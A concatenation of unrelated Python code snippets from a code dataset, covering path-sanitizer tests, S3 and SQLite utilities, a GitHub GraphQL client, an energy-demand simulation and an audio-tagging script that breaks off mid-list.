upward_path = os.path.join("this", "..", "path", "..", "has", "..", "upward", "..", "references", "..")
good_path = os.path.join("and", "subdirectory")
self.assertRaisesRegexp(ValueError, "absolute path which", self.action.sanitize_path, abs_path, root_dir)
self.assertRaisesRegexp(ValueError, "path outside of", self.action.sanitize_path, escape_path, root_dir)
self.assertEqual(root_dir, self.action.sanitize_path(upward_path, root_dir))
self.assertEqual(os.path.join(root_dir, good_path), self.action.sanitize_path(good_path, root_dir))
# create symlinks that may escape from directory
abs_symlink = "abs_symlink"
escape_symlink = "escape_symlink"
good_symlink = "good_symlink"
os.symlink(abs_path, os.path.join(self.directory, abs_symlink))
os.symlink(escape_path, os.path.join(self.directory, escape_symlink))
os.symlink(os.path.join(self.directory, good_path), os.path.join(self.directory, good_symlink))
self.assertRaisesRegexp(
ValueError, "path outside of", self.action.sanitize_path, abs_symlink, self.directory)
self.assertRaisesRegexp(
ValueError, "path outside of", self.action.sanitize_path, escape_symlink, self.directory)
self.assertEqual(
os.path.join(self.directory, good_path), self.action.sanitize_path(good_symlink, self.directory))
def test_get_files_and_folders(self):
expected_files_and_folders = filter(
lambda p: os.path.basename(p).startswith("too_old"),
self.files)
observed_files_and_folders = self.action.get_files_and_folders()
self.assertListEqual(expected_files_and_folders, observed_files_and_folders)
def test_purge_files_and_folders(self):
self.action.purge_files_and_folders(self.files)
self.assertTrue(all(map(lambda p: os.path.exists(os.path.join(self.directory, p)), self.files)))
self.action.dryrun = False
self.action.purge_files_and_folders(self.files)
self.assertFalse(any(map(lambda p: os.path.exists(os.path.join(self.directory, p)), self.files)))
self.action.purge_files_and_folders([""])
self.assertFalse(os.path.exists(self.directory))
def test_run(self):
directory_pattern = os.path.join("path", "to", "archive")
expected_directory = os.path.join("/data", socket.gethostname(), directory_pattern)
expected_output = filter(lambda p: p.startswith("too_old"), self.files)
self.action = self.get_instance(directory_pattern, self.age_in_days, self.dryrun, self.execution_id)
self.assertEqual(expected_directory, self.action.archive_base_dir)
with mock.patch.object(
self.action, 'get_files_and_folders') as get_files_and_folders, mock.patch.object(
self.action, 'purge_files_and_folders') as purge_files_and_folders:
get_files_and_folders.return_value = expected_output
observed_output = self.action.purge()
self.assertListEqual(expected_output, observed_output)
get_files_and_folders.assert_called_once_with()
purge_files_and_folders.assert_called_once_with(expected_output)
# also, ensure that exceptions are handled properly
purge_files_and_folders.side_effect = IOError("key error raised by mock")
self.assertRaises(IOError, self.action.purge)
get_files_and_folders.side_effect = ValueError("value error raised by mock")
self.assertRaises(ValueError, self.action.purge)
| StarcoderdataPython |
3243559 | <gh_stars>0
import argparse
import os, sys
import json
from shutil import copyfile
this_file_path = os.path.dirname(os.path.realpath(__file__))
sys.path.append(this_file_path.split('generators')[0])
from helper_functions import get_Manchester_Syntax
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--example_config", type=str, default=this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ntn.xml", \
help="Path to an example configuration file")
args = parser.parse_args()
kbs = ["carcinogenesis", "mutagenesis", "family-benchmark", "semantic_bible", "vicodi"]
for kb in kbs:
path = this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+".owl"
if kb == "family-benchmark":
path = this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+"_rich_background.owl"
if not os.path.isfile(path):
if kb != "family-benchmark":
copyfile(this_file_path.split('generators')[0]+"Datasets/"+kb+"/"+kb+".owl", this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+".owl")
else:
copyfile(this_file_path.split('generators')[0]+"Datasets/"+kb+"/"+kb+"_rich_background.owl", this_file_path.split('generators')[0]+"dl-foil/DLFoil2/ontos/"+kb+"_rich_background.owl")
for kb in kbs:
with open(this_file_path.split('generators')[0]+"dl-foil/DLFoil2/"+kb+"_config.xml", "w") as file_config:
with open(this_file_path.split('generators')[0]+"Datasets/"+kb+"/Results/concept_learning_results_celoe_clp.json") as file_lp:
lps = json.load(file_lp)["Learned Concept"]
with open(args.example_config) as file_example:
example_lines = file_example.readlines()
i = 0
for line in example_lines:
if "<kb>file" in line:
file_name = kb+".owl" if kb != "family-benchmark" else "family-benchmark_rich_background.owl"
file_config.write("<kb>file:./ontos/"+file_name+"</kb>")
i += 1
continue
file_config.write(line)
i += 1
if "\t<targets>" in line:
break
file_config.write("\n")
for lp in lps:
file_config.write("\t\t<target>\n")
file_config.write("\t\t"+get_Manchester_Syntax(lp)+"\n")
file_config.write("\t\t</target>\n")
file_config.write("\n")
write = False
while i < len(example_lines):
if "</targets>" in example_lines[i]:
write = True
if write:
file_config.write(example_lines[i])
i += 1
| StarcoderdataPython |
1656669 | """
Find the largest 0 to 9 pandigital
that can be formed by concatenating products
""" | StarcoderdataPython |
58027 | <reponame>husqvarnagroup/GETL
"""
The Utils module containing utility functions for lift jobs.
Utilities supported:
1. json_to_spark_schema: Converts a json schema to spark schema.
2. delete_files: Deletes a list of s3 files provided.
3. copy_keys: Copies files between S3 buckets.
4. copy_and_cleanup: Copies files between S3 and removes them from source.
"""
from typing import Dict, List, Tuple, TypeVar
from pyspark.sql.types import StructType
from getl.logging import get_logger
from .s3path import S3Path
LOGGER = get_logger(__name__)
JsonSchemaType = TypeVar("T", int, float, str)
def json_to_spark_schema(json_schema: Dict[str, JsonSchemaType]) -> StructType:
"""
Return Spark Schema for a JSON schema.
Args:
json_schema (Dict[str, JSON_SCHEMA_TYPE]): schema in json format.
Returns:
StructType: Spark Schema for the corresponding JSON schema.
Raises:
KeyError: Missing Schema key fields Name/Field/Nullable
TypeError: Invalid json was provided
"""
try:
return StructType.fromJson(json_schema)
except KeyError as key_error:
LOGGER.error(str(key_error))
raise KeyError(
"Missing key: {0}. Valid format: {1}".format(
str(key_error),
"All schema columns must have a name, type and nullable key",
)
)
except TypeError as key_error:
LOGGER.error(str(key_error))
raise TypeError("Invalid json was provided")
def delete_files(paths: List[str]) -> None:
"""Delete list of files from S3 bucket.
Args:
paths (List[str]): A list of paths pointing out to a key
Returns:
None
Raises:
PermissionError: When requested to deleted files from raw layer
Sample Use:
delete_files(['s3://landingzone/amc-connect/file.txt', 's3://datalake/amc/raw/file.txt'])
"""
# TODO: remove me
if any("husqvarna-datalake/raw/" in path for path in paths):
raise PermissionError(
"Access Denied: Not possible to remove files from raw layer"
)
for path in paths:
s3path = S3Path(path)
s3path.delete()
def copy_and_cleanup(paths: List[Tuple[str]]) -> None:
"""Move files from source S3 bucket to the destination bucket.
Args:
paths (List[Tuple[str]]): a list that represents [('source', 'target')...]
Returns:
None
Calls:
copy_keys to copy files between buckets
delete_files for source cleanup
Sample Use:
copy_keys([('landingzone/amc-connect/file.txt', 'datalake/amc/raw/file.txt')])
"""
copy_keys(paths)
delete_files([t[0] for t in paths])
def copy_keys(paths: List[Tuple[str]]) -> None:
"""Copy files from source S3 bucket to the destination bucket.
Args:
paths (List[Tuple[str]]): a list that represents [('source', 'target')...]
Returns:
None
Raises:
FileNotFoundError: When any of requested files are not found in S3
Sample Use:
copy_keys([('landingzone/amc-connect/file.txt', 'datalake/amc/raw/file.txt')])
"""
# TODO: Remove me
for path in paths:
source = S3Path(path[0])
target = S3Path(path[1])
source.copy(target)
| StarcoderdataPython |
1678039 | import sqlite3
from sqlbuilder.smartsql import Q, T, Result
from sqlbuilder.smartsql.dialects.sqlite import compile
from .Users import Users
class DbUsers(Users):
def __init__(self, db_name: str) -> None:
self.db_name = db_name
def add(self, email):
# type: (str) -> None
with sqlite3.connect(self.db_name) as connection:
connection.execute(
*Q(
T.user, result=Result(compile=compile)
).insert(
{
T.user.email: email
}
)
)
def contains(self, email):
# type: (str) -> bool
contains = False
with sqlite3.connect(self.db_name) as connection:
info = connection.execute(
*compile(Q(T.user).fields('*').where(T.user.email == email))
).fetchone()
if info:
contains = True
return contains
| StarcoderdataPython |
10036 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from appconf import AppConf
from django.conf import settings # noqa
class LabjsConf(AppConf):
ENABLED = not settings.DEBUG
DEBUG_TOGGLE = 'labjs'
| StarcoderdataPython |
171610 | from django.test import TestCase
from devnotes.models import Devnote
class DevnoteTestCases(TestCase):
def setUp(self):
Devnote.objects.create(name='testnote',
description='testnote description')
def test_retrieve_note(self):
"""retrieve the testnote"""
testnote=Devnote.objects.all()[0]
self.assertEqual(testnote.name, 'testnote')
def test_create_new_entry(self):
"""create new note"""
new_note = Devnote.objects.create(name='newnote',
description='newnote description')
db_entry= Devnote.objects.order_by('-created_at')[0]
self.assertEqual(new_note.name,db_entry.name)
| StarcoderdataPython |
88417 | <gh_stars>0
import json
import requests
from requests.models import Response
from src.models.GithubException import GithubException
class Graphql:
url: str
items_per_request: int
cursor = None
def __init__(self, url: str, items_per_request: int) -> None:
self.url = url
self.items_per_request = items_per_request
def get_disk_usage_query(self, owner: str, name: str):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
diskUsage
}
}
""" % {
'owner': owner,
'name': name,
}
def get_labels_query(self, owner: str, name: str):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
labels(first: 10, query: "bug error fix") {
nodes {
... on Label {
name
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def get_issues_query(self, owner: str, name: str, labels: list[str]):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
issues(first: %(issues)i, labels: [%(labels)s],after: %(after)s) {
pageInfo {
hasNextPage
}
edges {
cursor
node {
... on Issue {
id
state
}
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'issues': self.items_per_request,
'labels': ','.join('"{}"'.format(item) for item in labels),
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def get_prs_query(self, owner: str, name: str, labels: list[str]):
return """
query {
repository(owner: "%(owner)s", name: "%(name)s") {
pullRequests(first: %(issues)i, after: %(after)s) {
pageInfo {
hasNextPage
}
edges {
cursor
node {
... on PullRequest {
id
state
body
labels(first: 10) {
nodes {
name
}
}
}
}
}
}
}
}
""" % {
'owner': owner,
'name': name,
'issues': self.items_per_request,
'after': ('"{}"'.format(self.cursor) if self.cursor else 'null')
}
def _fetch_data(self, query: str, token: str) -> dict:
response: Response = requests.post(self.url, json={'query': query}, headers={
'Authorization': token
})
if response.status_code != 200:
raise GithubException(
'There was an error while trying to make the request'
)
return json.loads(response.text)
def get_labels_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
labels_nodes = json_data['data']['repository']['labels']['nodes']
return [item['name'] for item in labels_nodes]
def get_disk_usage_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
disk_usage = json_data['data']['repository']['diskUsage']
return disk_usage
def get_issues_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
issues = json_data['data']['repository']['issues']
has_next_page = issues['pageInfo']['hasNextPage']
edges: list = issues['edges']
if not has_next_page:
self.cursor = None
else:
self.cursor = edges[-1]['cursor']
return edges, has_next_page
def get_prs_data(self, query: str, token: str):
json_data = self._fetch_data(query, token)
prs = json_data['data']['repository']['pullRequests']
has_next_page = prs['pageInfo']['hasNextPage']
edges: list = prs['edges']
if not has_next_page:
self.cursor = None
else:
self.cursor = edges[-1]['cursor']
return edges, has_next_page
| StarcoderdataPython |
157617 | """Part of the flag-loader project.
Copyright: (C) 2014 <NAME>
License: MIT License (see LICENSE.txt)
Exported classes: BaseResolver
"""
from abc import ABCMeta, abstractmethod
class BaseResolver(object, metaclass=ABCMeta):
"""Abstract base class for all resolvers."""
@abstractmethod
def get_flag(self, data):
pass
@abstractmethod
def normalize(self, data):
pass
| StarcoderdataPython |
127362 | <reponame>AlbertSuarez/casescan
from src.engine.initializator import cases_db
from src.helper import response_builder
def get(case_id=None):
if case_id:
if case_id in cases_db:
return response_builder.make(
False, response=dict(results=[dict(case_id=case_id, sections=cases_db.get(case_id))])
)
else:
return response_builder.make(True, message=f'Clinical case with id [{case_id}] could not be found.')
else:
return response_builder.make(
False, response=dict(results=[dict(case_id=k, sections=v) for k, v in cases_db.items()])
)
| StarcoderdataPython |
3262464 | import warnings
# Version
__version__ = '0.2.0'
# Check for dependencies
hard_dependencies = ['numpy','pandas','seaborn','scipy','matplotlib','sklearn']
missing_dependencies = []
for dependency in hard_dependencies:
try:
__import__(dependency)
except ImportError as e:
missing_dependencies.append(dependency)
if missing_dependencies:
warnings.warn("Missing required dependencies {0}".format(missing_dependencies), ImportWarning)
del hard_dependencies, dependency, missing_dependencies
| StarcoderdataPython |
11818 | <filename>algorithms/python/118.py
class Solution:
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0: return []
rls = [[1]]
for i in range(2, numRows+1):
row = [1] * i
for j in range(1, i-1):
row[j] = rls[-1][j-1] + rls[-1][j]
rls.append(row)
return rls
| StarcoderdataPython |
1617739 | <reponame>IvanGavrilin/pyview
# The MIT License (MIT)
#
# Copyright (c) 2016 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# marker: see MPL doc
_SUPPORTED_ARGS = dict(size=1, color=1, alpha=1, zorder=1)
_FLOAT_ARGS = dict(alpha=1, size=1)
class Channel:
def __init__(self, stream, ax, **kw):
self.stream = stream
self.dirty = True
self.datatm = []
self.data = []
self.axes = ax
args = {}
for k, v in kw.items():
if not k in _SUPPORTED_ARGS:
#raise Exception("Line: unknown arg '{}'".format(k))
continue
if k in _FLOAT_ARGS:
args[k] = float(v)
else:
args[k] = str(v)
self.props = args
def prepare_artists(self):
if not self.dirty:
return False
if self.data:
self.axes.set_title(self.data[-1], **self.props)
self.dirty = False
return True
def destroy(self):
self.axes.set_title('')
self.stream = None
def update_from_str(self, tm, line):
self.dirty = True
self.datatm.append(tm)
self.data.append(line)
self.stream.invalidate()
def _update_text(self, text, text_tm):
old_title = self.axes.get_title()
if old_title != text:
self.axes.set_title(text, **self.props)
return (True, text_tm)
return (False, )
def mouse_move(self, event):
for i in range(len(self.datatm)-1, -1, -1):
if event.xdata >= self.datatm[i]:
return self._update_text(self.data[i], self.datatm[i])
return self._update_text('', None)
def mouse_leave(self, event):
return self._update_text(self.data[-1], None)
| StarcoderdataPython |
3327281 | import numpy as np
from sklearn.decomposition import PCA
from sklearn.linear_model import LogisticRegression
from data_utils import *
def predict_all(model, all_data):
"""
Predict odor probabilities for all trials.
:param model: (keras) decoding model
:param all_data: (4d numpy array) data of format [trial, window, neuron, time]
:return: (3d numpy array) prediction of format [trial, time, odor]
"""
test = stack_data(all_data, 25, 10)
n_trial, n_window = test.shape[0:2]
all_pred = np.zeros((n_trial, n_window, 5))
for i in range(n_trial):
all_pred[i, :, :] = model.predict(test[i, :, :, :])
return all_pred
def extract_latent(intermediate_layer, spike_data, lfp_data, tetrode_ids, tetrode_units, window, stride):
"""
Extract latent representation of decoding model.
:param intermediate_layer: (keras) function that outputs last hidden layer
:param spike_data: (3d numpy array) spike train data of format [trial, neuron, time]
:param lfp_data: (3d numpy array ) LFP data of format [trial, tetrode, time]
:param tetrode_ids: (list) of tetrode ids in the order of LFP data
:param tetrode_units: (dict) number of neuron units on each tetrode
:param window: (int) time window size must be the same for training the model
:param stride: (int) moving window stride
:return: (3d numpy array) latent space of format [trial, window, dim]
"""
spike_stack = stack_data(spike_data, window, stride)
lfp_stack = stack_data(lfp_data, window, stride)
n_trial, n_window = spike_stack.shape[:2]
all_latent = np.zeros((n_trial, n_window, 10))
for i in range(n_window):
test_data = organize_tetrode(spike_stack[:, i, :, :], lfp_stack[:, i, :, :],
tetrode_ids, tetrode_units, verbose=False)
latent = intermediate_layer.predict(test_data)
all_latent[:, i, :] = latent
return all_latent
def latent_models(latent_data, latent_target, decoding_index):
"""
Create models in latent space: PCA model to reduce dimensionality and logistic regression model for decoding.
:param latent_data: (3d numpy array) latent space of format [trial, window, dim]
:param latent_target: (1d numpy array) odor target
:param decoding_index: (int) which time window to use
:return: (sklearn) PCA and LR models
"""
temp = np.split(latent_data, latent_data.shape[1], axis=1)
latent_stack = np.vstack([x[:, 0, :] for x in temp])
pca = PCA(n_components=2)
pca = pca.fit(latent_stack)
latent_decoding = pca.transform(latent_data[:, decoding_index, :])
clf = LogisticRegression(multi_class='multinomial', solver='lbfgs')
clf = clf.fit(latent_decoding, latent_target)
return pca, clf
def latent_grid(latent_data, pca, clf, h=0.01):
"""
Create grid in latent for visualization.
"""
temp = np.split(latent_data, latent_data.shape[1], axis=1)
latent_stack = np.vstack([x[:, 0, :] for x in temp])
principal = pca.transform(latent_stack)
x_max, y_max = np.max(principal, axis=0) + 0.1
x_min, y_min = np.min(principal, axis=0) - 0.1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
return xx, yy, Z
def align_rolling(trial_idx, time_idx, data_spike, scaler, decoder):
"""
Predict with a rolling window around SWR events.
"""
rolling_hat = np.zeros((20, 4))
for i in range(20):
current_start = time_idx - 20 + i * 2
current_end = current_start + 25
current_window = np.expand_dims(data_spike[trial_idx, :, current_start:current_end], axis=0)
current_data = scaler.transform(np.mean(current_window, axis=2))
current_hat = decoder.predict_proba(current_data)
rolling_hat[i, :] = current_hat
return rolling_hat
| StarcoderdataPython |
1669854 | <reponame>bcpki/bitcoin
#!/usr/bin/env python
#
# BCPKI - BlockchainPKI
# Copyright (C) 2013 <EMAIL>, <EMAIL>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys, getopt, os
from bcert import *
# default
ascii = data = binhex = store = filename = False
pretty = True
optlist,args = getopt.getopt(sys.argv[1:],'adxsf')
for (k,v) in optlist:
if k in ["-a","-d","-x","-f"]:
pretty = False
if k == "-a": ascii = True
elif k == "-d": data = True
elif k == "-x": binhex = True
elif k == "-s": store = True
elif k == "-f": filename = True
if store:
idx = alias2idx(args[0])
fname = os.path.expanduser('~/.bitcoin/testnet3/bcerts/'+idx+'.bcrt')
if filename: print idx
else:
fname = args[0]
bcrt = open(fname).read()
if pretty: print bcrt2cert(bcrt)
if ascii: print bcrt2asciiarmored(bcrt)
if data: print bcrt2hashx(bcrt)
if binhex: print bcrt.encode('hex')
| StarcoderdataPython |
4802130 | <filename>00Python/day07/basic02.py<gh_stars>100-1000
"""
函数中的局部变量的释放狮是在函数执行完后就马上消失
全局变量是等真个程序运行完后进行销毁,作用域是整个函数
1- 如果局部变量名和全局的相同,那么执行的时候根据就近原则
2- 如果函数内找不到该变量名,那么就去找全局变量
3- 如果函数内想要就该外面的全局变量,使用globe关键字
"""
num = 10
def my_func01():
# num = 20 这里是创建一个新的内部变量
global num
num = 20 # 这里告诉函数并非创建新的局部变量,而是使用全局的变量操作
print("内部num = %s" % num)
my_func01()
print("外部num = %s" % num)
"""
函数自建函数文档说明help(len)
如果函数内没有自定义文档说明,那么就返回找函数名上面一行的注释
"""
help(len)
# 这里是没有专门的说明进行返回的内容
def my_func02(num01, num02):
"""
返回两个参数的和
:param num01: 数字1
:param num02: 数字2
:return: 两个数字的和
"""
return num01 + num02
help(my_func02)
"""
id(obj)查找obj内存的物理地址引用门牌号
类似:定了一个房间但是没有入住,调用的时候才入住
a,b指向同一个房间,节省内存
"""
a = 1000
b = 1000
c = "abc" # 字符串,元祖()等不可不的数据类型,修改的话是copy重新开一个房间
d = "abc" # 列表[],字典可变数据结构,修改的话是在同一个房间进行修改的。
c = "abcd"
print(id(a))
print(id(b))
print(id(c))
print(id(d))
| StarcoderdataPython |
4819287 | <filename>backend/simulation/demandside/building.py
from simulation.demandside.component import ComponentSim
from simulation.location_entity import LocationEntity
from database.models import Building
class BuildingSim(LocationEntity):
def __init__(self, name, lat, long, listOfComponents, historicalData, hour = 0):
LocationEntity.__init__(self, name, lat, long)
self.listOfComponets = listOfComponents
self.historicalData = historicalData
self.hour = hour
@classmethod
def createFromModel(cls, building):
listOfComponets = []
for comp in building.components:
listOfComponets.append(ComponentSim(comp.name, comp.est, comp.let, comp.e, comp.lot))
return cls(building.name, building.lat, building.long, listOfComponets, building.historicalData)
@classmethod
def household(cls, name, lat, long):
washing_machine = ComponentSim("washing_machine", 9, 17, 2, 2)
dish_washer = ComponentSim("dish_washer", 9, 12, 1.8, 2)
spin_dryer = ComponentSim("spin_dryer", 13, 18, 2.5, 1)
electrical_vehicle = ComponentSim("electrical_vehicle", 18, 24, 3.5, 3)
vacuum_cleaner = ComponentSim("vacuum_cleaner", 9, 17, 1.2, 1)
listOfComponets = [washing_machine, dish_washer, spin_dryer, electrical_vehicle, vacuum_cleaner]
historicalData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
return cls(name, lat, long, listOfComponets, historicalData)
@classmethod
def office(cls, name, lat, long):
dish_washer1 = ComponentSim("dish_washer1", 9, 12, 1.8, 2)
dish_washer2 = ComponentSim("dish_washer2", 9, 12, 1.8, 2)
dish_washer3 = ComponentSim("dish_washer3",9, 12, 1.8, 2)
dish_washer4 = ComponentSim("dish_washer4",9, 12, 1.8, 2)
vacuum_cleaner1 = ComponentSim("vacuum_cleaner1", 7, 10, 1.2, 1)
vacuum_cleaner2 = ComponentSim("vacuum_cleaner2", 7, 9, 1.2, 1)
vacuum_cleaner3 = ComponentSim("vacuum_cleaner3", 19, 21, 1.2, 1)
vacuum_cleaner4 = ComponentSim("vacuum_cleaner4", 19, 23, 1.2, 1)
electrical_vehicle1 = ComponentSim("electrical_vehicle1", 8, 18, 3.5, 3)
electrical_vehicle2 = ComponentSim("electrical_vehicle2",18, 24, 3.5, 3)
listOfComponets = [dish_washer1, dish_washer2, dish_washer3, dish_washer4, vacuum_cleaner1, vacuum_cleaner2, vacuum_cleaner3, vacuum_cleaner4, electrical_vehicle1, electrical_vehicle2]
historicalData = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
return cls(name, lat, long, listOfComponets, historicalData)
def currentDemand(self):
'''returns the current demand of this building'''
demandSum = self.historicalData[self.hour];
for component in self.listOfComponets:
demandSum += component.currentDemand()
return demandSum
def update(self, hour):
'''updates the state of all components in this building with the current time'''
self.hour = hour % 24
for component in self.listOfComponets:
component.update(hour)
if __name__ == "__main__":
home = BuildingSim.household("home1", 0, 0)
for hour in range(0, 25):
home.update(hour)
print("----------------------------")
print("Hour: " + str(hour))
print("Current Demand: " + str(home.currentDemand(hour)))
for comp in home.listOfComponets:
print(comp.state, "\t" + comp.name)
| StarcoderdataPython |
78492 | <filename>vim/inference_rt.py
import os
import sys
sys.path.insert(1, os.path.join(sys.path[0], '../'))
import numpy as np
import h5py
import argparse
import time
import logging
from sklearn import metrics
from utils import utilities, data_generator, agument
import tensorflow as tf
slim = tf.contrib.slim
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from mfcc import vggish_input as mfcc
from mfcc import vggish_params
import multiprocessing as mp
import audio_sample
try:
import cPickle
except BaseException:
import _pickle as cPickle
# Environment replace Speech
labels = ['Environment', 'Male_speechAND_man_speaking', 'Female_speechAND_woman_speaking'
, 'Child_speechAND_kid_speaking', 'Conversation', 'NarrationAND_monologue'
, 'Babbling', 'Speech_synthesizer', 'Shout', 'Bellow', 'Whoop', 'Yell'
, 'Battle_cry', 'Children_shouting', 'Screaming', 'Whispering', 'Laughter'
, 'Baby_laughter', 'Giggle', 'Snicker', 'Belly_laugh', 'ChuckleAND_chortle'
, 'CryingAND_sobbing', 'Baby_cryAND_infant_cry', 'Whimper', 'WailAND_moan'
, 'Sigh', 'Singing', 'Choir', 'Yodeling', 'Chant', 'Mantra', 'Male_singing'
, 'Female_singing', 'Child_singing', 'Synthetic_singing', 'Rapping', 'Humming'
, 'Groan', 'Grunt', 'Whistling', 'Breathing', 'Wheeze', 'Snoring', 'Gasp', 'Pant'
, 'Snort', 'Cough', 'Throat_clearing', 'Sneeze', 'Sniff', 'Run', 'Shuffle'
, 'WalkAND_footsteps', 'ChewingAND_mastication', 'Biting', 'Gargling'
, 'Stomach_rumble', 'BurpingAND_eructation', 'Hiccup', 'Fart', 'Hands'
, 'Finger_snapping', 'Clapping', 'Heart_soundsAND_heartbeat', 'Heart_murmur'
, 'Cheering', 'Applause', 'Chatter', 'Crowd'
, 'HubbubAND_speech_noiseAND_speech_babble', 'Children_playing', 'Animal'
, 'Domestic_animalsAND_pets', 'Dog', 'Bark', 'Yip', 'Howl', 'Bow-wow', 'Growling'
, 'Whimper_(dog)', 'Cat', 'Purr', 'Meow', 'Hiss', 'Caterwaul'
, 'LivestockAND_farm_animalsAND_working_animals', 'Horse', 'Clip-clop'
, 'NeighAND_whinny', 'CattleAND_bovinae', 'Moo', 'Cowbell', 'Pig', 'Oink', 'Goat'
, 'Bleat', 'Sheep', 'Fowl', 'ChickenAND_rooster', 'Cluck'
, 'CrowingAND_cock-a-doodle-doo', 'Turkey', 'Gobble', 'Duck', 'Quack', 'Goose'
, 'Honk', 'Wild_animals', 'Roaring_cats_(lionsAND_tigers)', 'Roar', 'Bird'
, 'Bird_vocalizationAND_bird_callAND_bird_song', 'ChirpAND_tweet', 'Squawk'
, 'PigeonAND_dove', 'Coo', 'Crow', 'Caw', 'Owl', 'Hoot'
, 'Bird_flightAND_flapping_wings', 'CanidaeAND_dogsAND_wolves'
, 'RodentsAND_ratsAND_mice', 'Mouse', 'Patter', 'Insect', 'Cricket', 'Mosquito'
, 'FlyAND_housefly', 'Buzz', 'BeeAND_waspAND_etc.', 'Frog', 'Croak', 'Snake'
, 'Rattle', 'Whale_vocalization', 'Music', 'Musical_instrument'
, 'Plucked_string_instrument', 'Guitar', 'Electric_guitar', 'Bass_guitar'
, 'Acoustic_guitar', 'Steel_guitarAND_slide_guitar'
, 'Tapping_(guitar_technique)', 'Strum', 'Banjo', 'Sitar', 'Mandolin', 'Zither'
, 'Ukulele', 'Keyboard_(musical)', 'Piano', 'Electric_piano', 'Organ'
, 'Electronic_organ', 'Hammond_organ', 'Synthesizer', 'Sampler', 'Harpsichord'
, 'Percussion', 'Drum_kit', 'Drum_machine', 'Drum', 'Snare_drum', 'Rimshot'
, 'Drum_roll', 'Bass_drum', 'Timpani', 'Tabla', 'Cymbal', 'Hi-hat', 'Wood_block'
, 'Tambourine', 'Rattle_(instrument)', 'Maraca', 'Gong', 'Tubular_bells'
, 'Mallet_percussion', 'MarimbaAND_xylophone', 'Glockenspiel', 'Vibraphone'
, 'Steelpan', 'Orchestra', 'Brass_instrument', 'French_horn', 'Trumpet'
, 'Trombone', 'Bowed_string_instrument', 'String_section', 'ViolinAND_fiddle'
, 'Pizzicato', 'Cello', 'Double_bass'
, 'Wind_instrumentAND_woodwind_instrument', 'Flute', 'Saxophone', 'Clarinet'
, 'Harp', 'Bell', 'Church_bell', 'Jingle_bell', 'Bicycle_bell', 'Tuning_fork'
, 'Chime', 'Wind_chime', 'Change_ringing_(campanology)', 'Harmonica'
, 'Accordion', 'Bagpipes', 'Didgeridoo', 'Shofar', 'Theremin', 'Singing_bowl'
, 'Scratching_(performance_technique)', 'Pop_music', 'Hip_hop_music'
, 'Beatboxing', 'Rock_music', 'Heavy_metal', 'Punk_rock', 'Grunge'
, 'Progressive_rock', 'Rock_and_roll', 'Psychedelic_rock', 'Rhythm_and_blues'
, 'Soul_music', 'Reggae', 'Country', 'Swing_music', 'Bluegrass', 'Funk'
, 'Folk_music', 'Middle_Eastern_music', 'Jazz', 'Disco', 'Classical_music'
, 'Opera', 'Electronic_music', 'House_music', 'Techno', 'Dubstep'
, 'Drum_and_bass', 'Electronica', 'Electronic_dance_music', 'Ambient_music'
, 'Trance_music', 'Music_of_Latin_America', 'Salsa_music', 'Flamenco', 'Blues'
, 'Music_for_children', 'New-age_music', 'Vocal_music', 'A_capella'
, 'Music_of_Africa', 'Afrobeat', 'Christian_music', 'Gospel_music'
, 'Music_of_Asia', 'Carnatic_music', 'Music_of_Bollywood', 'Ska'
, 'Traditional_music', 'Independent_music', 'Song', 'Background_music'
, 'Theme_music', 'Jingle_(music)', 'Soundtrack_music', 'Lullaby'
, 'Video_game_music', 'Christmas_music', 'Dance_music', 'Wedding_music'
, 'Happy_music', 'Funny_music', 'Sad_music', 'Tender_music', 'Exciting_music'
, 'Angry_music', 'Scary_music', 'Wind', 'Rustling_leaves'
